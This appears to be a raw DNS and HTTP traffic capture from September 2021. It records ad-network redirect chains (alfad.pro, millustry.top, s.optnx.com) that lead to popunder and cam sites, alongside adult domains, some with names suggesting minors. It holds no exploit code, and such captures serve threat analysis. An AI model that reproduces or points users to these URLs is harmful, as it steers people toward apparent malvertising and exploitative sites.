DNSbidder.criteo.comRequestbidder.criteo.comIN AResponsebidder.criteo.comIN CNAMEbidder.par.vip.prod.criteo.combidder.par.vip.prod.criteo.comIN A178.250.0.165
-
DNSbrightcombid.marphezis.comRequestbrightcombid.marphezis.comIN AResponsebrightcombid.marphezis.comIN CNAMEbc-bidder-alb-1485194680.us-east-1.elb.amazonaws.combc-bidder-alb-1485194680.us-east-1.elb.amazonaws.comIN A35.175.3.198bc-bidder-alb-1485194680.us-east-1.elb.amazonaws.comIN A52.23.81.244bc-bidder-alb-1485194680.us-east-1.elb.amazonaws.comIN A54.164.242.127bc-bidder-alb-1485194680.us-east-1.elb.amazonaws.comIN A34.239.203.97
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSav18.usRequestav18.usIN AResponseav18.usIN A207.180.237.38
-
DNSsexy-wife.comRequestsexy-wife.comIN AResponsesexy-wife.comIN A167.86.103.60
-
DNSqihuu.netRequestqihuu.netIN AResponseqihuu.netIN A5.181.218.143
-
GEThttp://alfad.pro/ad/ad?p=266933&w=628713&t=9f91bef8a2cfed85&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=628713&t=9f91bef8a2cfed85&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/628713
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:55:02 GMT
Location: https://m1.firon.xyz/?s1=0&utm_campaign=Remnantnewtest&utm_medium=c8c78a53dcf735c1c683d5fc856523882fab7c4c
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSlangmm.ruRequestlangmm.ruIN AResponselangmm.ruIN A212.107.18.203
-
DNSnicebaby.xyzRequestnicebaby.xyzIN AResponsenicebaby.xyzIN A207.180.237.38
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.110millustry.topIN A13.227.222.73millustry.topIN A13.227.222.102millustry.topIN A13.227.222.89
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627547&t=3dfd86b3e5a86710&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627547&t=3dfd86b3e5a86710&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 OPR/57.0.3098.106
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627547
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:55:02 GMT
Location: https://www.fpcpopunder.com/popunder/popunder.cgi?program=light&account=pub_fpc_popcash&track=A
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://alfad.pro/go/266933/619425RequestGET /go/266933/619425 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; GWX:RESERVED)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://javsex.us/goung.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:55:02 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 313
Connection: keep-alive
-
GEThttp://alfad.pro/ad/ad?p=266933&w=628718&t=65dff0d8abd339ec&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=628718&t=65dff0d8abd339ec&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/537.86.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/628718
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:55:02 GMT
Location: https://m1.firon.xyz/?s1=0&utm_campaign=Remnantnewtest&utm_medium=c8c78a53dcf735c1c683d5fc856523882fab7c4c
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://av18.us/goadv.phpRequestGET /goadv.php HTTP/1.1
Host: av18.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://alfad.pro/ad/ad?p=266933&w=622935&t=773454a0fe7fd02f&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=622935&t=773454a0fe7fd02f&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/622935
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:55:02 GMT
Location: https://bongacams7.com/track?v=2&c=602941
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://sexy-wife.com/adv.phpRequestGET /adv.php HTTP/1.1
Host: sexy-wife.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://nicebaby.xyz/default.phpRequestGET /default.php HTTP/1.1
Host: nicebaby.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 9; SM-A805F Build/PPR1.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.116 Mobile Safari/537.36 Viber/13.5.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://millustry.top/redirect?tid=925007RequestGET /redirect?tid=925007 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://hornytit.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNShbopenbid.pubmatic.comRequesthbopenbid.pubmatic.comIN AResponsehbopenbid.pubmatic.comIN CNAMEhbopenbid22000nfc.pubmatic.comhbopenbid22000nfc.pubmatic.comIN CNAMEhbopenbid22000nf.pubmatic.comhbopenbid22000nf.pubmatic.comIN A185.64.189.112
-
DNSfastlane.rubiconproject.comRequestfastlane.rubiconproject.comIN AResponsefastlane.rubiconproject.comIN CNAMEtagged-by.rubiconproject.net.akadns.nettagged-by.rubiconproject.net.akadns.netIN A213.19.162.21tagged-by.rubiconproject.net.akadns.netIN A213.19.162.51tagged-by.rubiconproject.net.akadns.netIN A213.19.162.41tagged-by.rubiconproject.net.akadns.netIN A213.19.162.31tagged-by.rubiconproject.net.akadns.netIN A213.19.162.61
-
DNSask-media-group-d.openx.netRequestask-media-group-d.openx.netIN AResponseask-media-group-d.openx.netIN A34.98.64.218ask-media-group-d.openx.netIN A35.244.159.8
-
DNSbtlr.sharethrough.comRequestbtlr.sharethrough.comIN AResponsebtlr.sharethrough.comIN CNAMEbtlr-ecs-eu-central-1.sharethrough.combtlr-ecs-eu-central-1.sharethrough.comIN A3.122.57.214btlr-ecs-eu-central-1.sharethrough.comIN A35.156.13.167btlr-ecs-eu-central-1.sharethrough.comIN A35.157.32.122btlr-ecs-eu-central-1.sharethrough.comIN A18.156.157.131btlr-ecs-eu-central-1.sharethrough.comIN A52.29.213.60btlr-ecs-eu-central-1.sharethrough.comIN A3.126.220.154btlr-ecs-eu-central-1.sharethrough.comIN A18.158.15.79btlr-ecs-eu-central-1.sharethrough.comIN A35.157.23.185
-
DNSprg.smartadserver.comRequestprg.smartadserver.comIN AResponseprg.smartadserver.comIN CNAMEprga.smartadserver.comprga.smartadserver.comIN CNAMEhb-geo.delivery-prod-sas.akadns.nethb-geo.delivery-prod-sas.akadns.netIN CNAMEitx5.smartadserver.comitx5.smartadserver.comIN A185.86.138.16itx5.smartadserver.comIN A185.86.138.121itx5.smartadserver.comIN A185.86.138.32itx5.smartadserver.comIN A185.86.138.122
-
DNSib.adnxs.comRequestib.adnxs.comIN AResponseib.adnxs.comIN CNAMEg.geogslb.comg.geogslb.comIN CNAMEib.anycast.adnxs.comib.anycast.adnxs.comIN A37.252.173.62ib.anycast.adnxs.comIN A37.252.172.36ib.anycast.adnxs.comIN A37.252.172.45ib.anycast.adnxs.comIN A37.252.172.37ib.anycast.adnxs.comIN A37.252.173.38ib.anycast.adnxs.comIN A37.252.172.38ib.anycast.adnxs.comIN A37.252.172.250ib.anycast.adnxs.comIN A37.252.173.22
-
DNSc2shb.ssp.yahoo.comRequestc2shb.ssp.yahoo.comIN AResponsec2shb.ssp.yahoo.comIN CNAMEc2shb.one-mobile-prod.aws.oath.cloudc2shb.one-mobile-prod.aws.oath.cloudIN CNAMEssp-ats-prod-eu-central-1.one-mobile-prod.aws.oath.cloudssp-ats-prod-eu-central-1.one-mobile-prod.aws.oath.cloudIN A35.157.246.167ssp-ats-prod-eu-central-1.one-mobile-prod.aws.oath.cloudIN A18.156.195.47ssp-ats-prod-eu-central-1.one-mobile-prod.aws.oath.cloudIN A52.28.203.152
-
DNSbid.contextweb.comRequestbid.contextweb.comIN AResponsebid.contextweb.comIN CNAMElga-bid.contextweb.comlga-bid.contextweb.comIN CNAMElga-bid-bgp.contextweb.comlga-bid-bgp.contextweb.comIN A198.148.27.134lga-bid-bgp.contextweb.comIN A198.148.27.133
-
DNShtlb.casalemedia.comRequesthtlb.casalemedia.comIN AResponsehtlb.casalemedia.comIN CNAMEhtlb.casalemedia.com.edgekey.nethtlb.casalemedia.com.edgekey.netIN CNAMEe8037.i.akamaiedge.nete8037.i.akamaiedge.netIN A23.34.186.99
-
DNSads.servenobid.comRequestads.servenobid.comIN AResponseads.servenobid.comIN A34.200.74.74ads.servenobid.comIN A52.44.47.222ads.servenobid.comIN A34.226.8.89ads.servenobid.comIN A52.201.109.125ads.servenobid.comIN A3.228.239.71ads.servenobid.comIN A107.22.113.164ads.servenobid.comIN A18.210.36.232ads.servenobid.comIN A44.193.54.51
-
DNSssc.33across.comRequestssc.33across.comIN AResponsessc.33across.comIN CNAMEglobal.ssc.33across.comglobal.ssc.33across.comIN A34.149.20.76
-
DNSbidder.rtk.ioRequestbidder.rtk.ioIN AResponsebidder.rtk.ioIN A147.75.107.42bidder.rtk.ioIN A147.75.107.82
-
DNSweb.hb.ad.cpe.dotomi.comRequestweb.hb.ad.cpe.dotomi.comIN AResponseweb.hb.ad.cpe.dotomi.comIN CNAMEconvex.global.dual.dotomi.weighted.com.akadns.netconvex.global.dual.dotomi.weighted.com.akadns.netIN A89.207.16.210
-
DNSs.optnx.comRequests.optnx.comIN AResponses.optnx.comIN CNAMEtk6if76q.ab1n.nettk6if76q.ab1n.netIN A95.211.229.245tk6if76q.ab1n.netIN A95.211.229.247
-
DNSwww.google.nlRequestwww.google.nlIN AResponsewww.google.nlIN A142.251.36.3
-
DNSc.amazon-adsystem.comRequestc.amazon-adsystem.comIN AResponsec.amazon-adsystem.comIN CNAMEd1ykf07e75w7ss.cloudfront.netd1ykf07e75w7ss.cloudfront.netIN A52.222.142.111
-
DNSwww.fpcpopunder.comRequestwww.fpcpopunder.comIN AResponsewww.fpcpopunder.comIN CNAMEfpcpopunder.comfpcpopunder.comIN A66.154.95.74
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.73millustry.topIN A13.227.222.110millustry.topIN A13.227.222.89millustry.topIN A13.227.222.102
-
DNSmsgose.comRequestmsgose.comIN AResponsemsgose.comIN A104.21.48.29msgose.comIN A172.67.176.37
-
DNSteensporn.ruRequestteensporn.ruIN AResponseteensporn.ruIN A167.86.103.60
-
GEThttp://millustry.top/redirect?tid=937028RequestGET /redirect?tid=937028 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://shoppinghouse.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSeus.rubiconproject.comRequesteus.rubiconproject.comIN AResponseeus.rubiconproject.comIN CNAMEeus.rubiconproject.com.edgekey.neteus.rubiconproject.com.edgekey.netIN CNAMEe8960.b.akamaiedge.nete8960.b.akamaiedge.netIN A104.126.125.209
-
GEThttp://teensporn.ru/index.htmRequestGET /index.htm HTTP/1.1
Host: teensporn.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:08 GMT
Content-Type: text/html
Last-Modified: Thu, 24 Jun 2021 01:25:30 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"60d3df0a-800"
Content-Encoding: gzip
-
DNSad-cdn.technoratimedia.comRequestad-cdn.technoratimedia.comIN AResponsead-cdn.technoratimedia.comIN CNAMEcs1561.wpc.edgecastcdn.netcs1561.wpc.edgecastcdn.netIN A152.199.5.184
-
DNSmatch.adsrvr.orgRequestmatch.adsrvr.orgIN AResponsematch.adsrvr.orgIN CNAMEmatch-aga.adsrvr.orgmatch-aga.adsrvr.orgIN CNAMEa97adde81b00f2ca4.awsglobalaccelerator.coma97adde81b00f2ca4.awsglobalaccelerator.comIN A13.248.242.197a97adde81b00f2ca4.awsglobalaccelerator.comIN A76.223.111.131
-
DNSacdn.adnxs.comRequestacdn.adnxs.comIN AResponseacdn.adnxs.comIN CNAMEsecure-adnxs.edgekey.netsecure-adnxs.edgekey.netIN CNAMEe6115.g.akamaiedge.nete6115.g.akamaiedge.netIN A2.18.97.96
-
DNSbh.contextweb.comRequestbh.contextweb.comIN AResponsebh.contextweb.comIN CNAMElga-bh.contextweb.comlga-bh.contextweb.comIN CNAMElga-bh-bgp.contextweb.comlga-bh-bgp.contextweb.comIN A198.148.27.140lga-bh-bgp.contextweb.comIN A198.148.27.139
-
DNSssc-cms.33across.comRequestssc-cms.33across.comIN AResponsessc-cms.33across.comIN CNAMEpixel.33across.compixel.33across.comIN A67.202.105.23
-
DNSu.openx.netRequestu.openx.netIN AResponseu.openx.netIN A34.98.64.218u.openx.netIN A35.244.159.8
-
DNSads.pubmatic.comRequestads.pubmatic.comIN AResponseads.pubmatic.comIN CNAMEpubmatic.edgekey.netpubmatic.edgekey.netIN CNAMEe6603.g.akamaiedge.nete6603.g.akamaiedge.netIN A2.18.97.238
-
DNSyideo.ruRequestyideo.ruIN AResponseyideo.ruIN A212.107.18.203
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSweb5.xxxoxx.comRequestweb5.xxxoxx.comIN AResponseweb5.xxxoxx.comIN CNAMExxxoxx.comxxxoxx.comIN A167.86.103.60
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
DNSs.optnx.comRequests.optnx.comIN AResponses.optnx.comIN CNAMEtk6if76q.ab1n.nettk6if76q.ab1n.netIN A95.211.229.245tk6if76q.ab1n.netIN A95.211.229.246
-
DNSdryteen.usRequestdryteen.usIN AResponsedryteen.usIN A207.180.237.38
-
DNSjpteen.usRequestjpteen.usIN AResponsejpteen.usIN A207.180.237.38
-
DNSpennews.usRequestpennews.usIN AResponsepennews.usIN A207.180.237.38
-
DNSxxxmom.ruRequestxxxmom.ruIN AResponsexxxmom.ruIN A167.86.103.60
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://alfad.pro/go/266933/622592RequestGET /go/266933/622592 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:55:14 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
DNSonsanothi.bizRequestonsanothi.bizIN AResponseonsanothi.bizIN A52.222.139.93onsanothi.bizIN A52.222.139.29onsanothi.bizIN A52.222.139.9onsanothi.bizIN A52.222.139.108
-
GEThttp://s.optnx.com/cimp.php?data=TVRZek1Ea3lNVGsxTUh3M05qa3hZbVl3TkdGaE9EUXhOemhoWW1Vd1pUZ3hZV0UxT1dZNU9UazBNdy0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1qYXZzZXgsdXMsaW5kZXgsaHRtJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablR1bXFkSzZWMHJxcmJYU3VsZEs2WjBycFhTdWxkTTZWMHJwWFdXeTNYVlhXMHk2VjBUMDAyMjUzVzdjYWNhN1c2M1c3dXQxcDJybG1vc3IwMnI0cHJvMmw0NDI0enQwbHN1NDN1ZGRSTlhWUTd6TkJkMVJuSzV6cFhTdWxkVFM2VjBycFhTdWxjSDJ8aHR0cHwxNTQuNjEuNzEuNTF8VVNBfDQxfGFkLW1hdmVuLmNvbXw1MzEyOTR8NDMwNjc1fDgxNjI2MXwzNTc2NDExfDUwOHw0NTcwMDA2fDU4OTE5MDE0fDE1fDJ8MHwwfDU4OHw5MzE2NTN8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDc4MDk5NTk4NDBiNjMyNDQ4OGE5OGRmYmZjZDhjOThlfDhjNGQ2MDEzNzZiZDZmNDYzZDBmZmRmYThiMDc5ZmU5fDF8MHxqYXZzZXgudXN8MHwwfDB8MC4xNXwxfDB8ZXhjaGFuZ2VfbGlua3wwfDB8MHwtMXwwfDB8fHwyfDcyMHx8MHwwfDB8NDR8MHwwfDF8MHxPS3xjNDZhYzQxMGI4ZDczMTY3Mjc0ZDgwMGE1ZDE2N2VhYg--&p=http%3A%2F%2Fjavsex.us%2Findex.htm&tested=1&check=f80d2755c1fce1552792ed6c1d543efd&screen_resolution=1366x768&container_resolution=799x537&iframe=0RequestGET /cimp.php?data=TVRZek1Ea3lNVGsxTUh3M05qa3hZbVl3TkdGaE9EUXhOemhoWW1Vd1pUZ3hZV0UxT1dZNU9UazBNdy0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1qYXZzZXgsdXMsaW5kZXgsaHRtJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablR1bXFkSzZWMHJxcmJYU3VsZEs2WjBycFhTdWxkTTZWMHJwWFdXeTNYVlhXMHk2VjBUMDAyMjUzVzdjYWNhN1c2M1c3dXQxcDJybG1vc3IwMnI0cHJvMmw0NDI0enQwbHN1NDN1ZGRSTlhWUTd6TkJkMVJuSzV6cFhTdWxkVFM2VjBycFhTdWxjSDJ8aHR0cHwxNTQuNjEuNzEuNTF8VVNBfDQxfGFkLW1hdmVuLmNvbXw1MzEyOTR8NDMwNjc1fDgxNjI2MXwzNTc2NDExfDUwOHw0NTcwMDA2fDU4OTE5MDE0fDE1fDJ8MHwwfDU4OHw5MzE2NTN8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDc4MDk5NTk4NDBiNjMyNDQ4OGE5OGRmYmZjZDhjOThlfDhjNGQ2MDEzNzZiZDZmNDYzZDBmZmRmYThiMDc5ZmU5fDF8MHxqYXZzZXgudXN8MHwwfDB8MC4xNXwxfDB8ZXhjaGFuZ2VfbGlua3wwfDB8MHwtMXwwfDB8fHwyfDcyMHx8MHwwfDB8NDR8MHwwfDF8MHxPS3xjNDZhYzQxMGI4ZDczMTY3Mjc0ZDgwMGE1ZDE2N2VhYg--&p=http%3A%2F%2Fjavsex.us%2Findex.htm&tested=1&check=f80d2755c1fce1552792ed6c1d543efd&screen_resolution=1366x768&container_resolution=799x537&iframe=0 HTTP/1.1
Host: s.optnx.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://s.optnx.com/cimp.php?data=TVRZek1Ea3lNVGsxTUh3M05qa3hZbVl3TkdGaE9EUXhOemhoWW1Vd1pUZ3hZV0UxT1dZNU9UazBNdy0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1qYXZzZXgsdXMsaW5kZXgsaHRtJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablR1bXFkSzZWMHJxcmJYU3VsZEs2WjBycFhTdWxkTTZWMHJwWFdXeTNYVlhXMHk2VjBUMDAyMjUzVzdjYWNhN1c2M1c3dXQxcDJybG1vc3IwMnI0cHJvMmw0NDI0enQwbHN1NDN1ZGRSTlhWUTd6TkJkMVJuSzV6cFhTdWxkVFM2VjBycFhTdWxjSDJ8aHR0cHwxNTQuNjEuNzEuNTF8VVNBfDQxfGFkLW1hdmVuLmNvbXw1MzEyOTR8NDMwNjc1fDgxNjI2MXwzNTc2NDExfDUwOHw0NTcwMDA2fDU4OTE5MDE0fDE1fDJ8MHwwfDU4OHw5MzE2NTN8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDc4MDk5NTk4NDBiNjMyNDQ4OGE5OGRmYmZjZDhjOThlfDhjNGQ2MDEzNzZiZDZmNDYzZDBmZmRmYThiMDc5ZmU5fDF8MHxqYXZzZXgudXN8MHwwfDB8MC4xNXwxfDB8ZXhjaGFuZ2VfbGlua3wwfDB8MHwtMXwwfDB8fHwyfDcyMHx8MHwwfDB8NDR8MHwwfDF8MHxPS3xjNDZhYzQxMGI4ZDczMTY3Mjc0ZDgwMGE1ZDE2N2VhYg--
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __uvt=a%3A1%3A%7Bi%3A0%3Bs%3A33%3A%226135e538f19b57.766097531896998388%22%3B%7D
ResponseHTTP/1.1 302 Found
Server: nginx
Date: Mon, 06 Sep 2021 09:55:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
